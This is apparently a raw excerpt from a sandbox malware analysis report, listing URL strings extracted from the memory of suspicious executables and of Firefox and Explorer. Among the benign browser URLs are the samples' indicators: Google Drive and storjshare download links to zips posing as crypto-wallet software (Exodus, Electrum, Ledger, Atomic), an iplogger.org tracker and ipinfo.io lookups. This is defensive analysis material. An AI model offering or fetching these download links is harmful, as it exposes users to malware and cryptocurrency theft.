Source: dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://drive.google.com/uc?id=
Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD8000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE474000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download-
Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE46B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadG
Source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://drive.google.com/uc?id=URL:
Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE4D8000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2143503842.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/8
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Z
Source: AzVRM7c.exe, 0000000B.00000003.2183605759.000002E2774C4000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2143503842.000001CDE2B85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download-
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download/
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download3
Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadF
Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadG
Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadT
Source: dwVrTdy.exe, 00000009.00000003.2123112840.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2123248191.000001B9CE4AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadl
Source: dwVrTdy.exe, 0000000A.00000003.2143503842.000001CDE2B85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadt
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadv
Source: firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sFailed
Source: explorer.exe, 00000014.00000003.3074284180.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comE
Source: firefox.exe, 0000002C.00000002.2633561715.00000144AC8C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsGetti
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1_scheduleBestEffortUserIdleTasks/
Source: firefox.exe, 0000002C.00000002.2610517942.00000144A9D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: be08f59021.exe, 00000016.00000003.3054113358.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.3054373991.000000000565C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g-cleanit.hk
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/matchPatterns.jsonexperiment-apis/sys
Source: F0A3.tmp.ctx.exe, 00000027.00000002.2446819556.0000024337180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: firefox.exe, 0000002C.00000002.2586946099.000001449CF11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881jar:file
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/$
Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fZ
Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/O
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json&
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json1
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonFw
Source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonZ
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonhE
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonn
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonp
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D6457A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsons
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: be08f59021.exe, 00000016.00000003.3054113358.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.3054373991.000000000565C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64546000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD0000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2773D6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64546000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: firefox.exe, 0000002C.00000002.2836484023.000012B890804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2709016871.00000144AF89F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000002C.00000002.2709016871.00000144AF89F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://pdf.js/PdfJsDefaultPreferences.sys.mjsM
Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sresource://gre/modules/FileUtils.sys.mjs
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.comhttps://support.mozilla.orgtestPermissionFromPrincipalremoveTabsProgressL
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: explorer.exe, 00000014.00000003.3074284180.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comNaP0B
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/
Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js9548D9F
Source: firefox.exe, 0000002C.00000002.2631442562.00000144AC439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: explorer.exe, 00000014.00000000.2221917416.000000000D0D6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcemberZ
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js99FCFE5DV
Source: AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsU
